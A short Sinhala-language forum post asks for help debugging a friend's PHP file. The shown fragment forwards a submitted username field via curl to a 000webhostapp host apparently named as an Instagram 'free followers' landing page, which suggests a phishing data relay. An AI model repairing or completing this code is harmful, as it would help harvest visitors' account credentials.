PHP වැඩ්ඩෙක් බලන්වද මේ කෝඩ් එක හරිද කියලා..
මචන් මේ වෙබ් එකේ php ටික මට යලුවෙක් ලියල දුන්න, එත් වැඩකරන්නෙ නැහැ, පොඩ්ඩක් දන්න කෙනෙක් කියනවද මොකක්ද අවුල කියල?
get.php
<?php
$post = [
'usr' => $_POST['usr'],
];
$ch = curl_init('https://landing-page-ig-free-fol.000webhostapp.com/get.php')...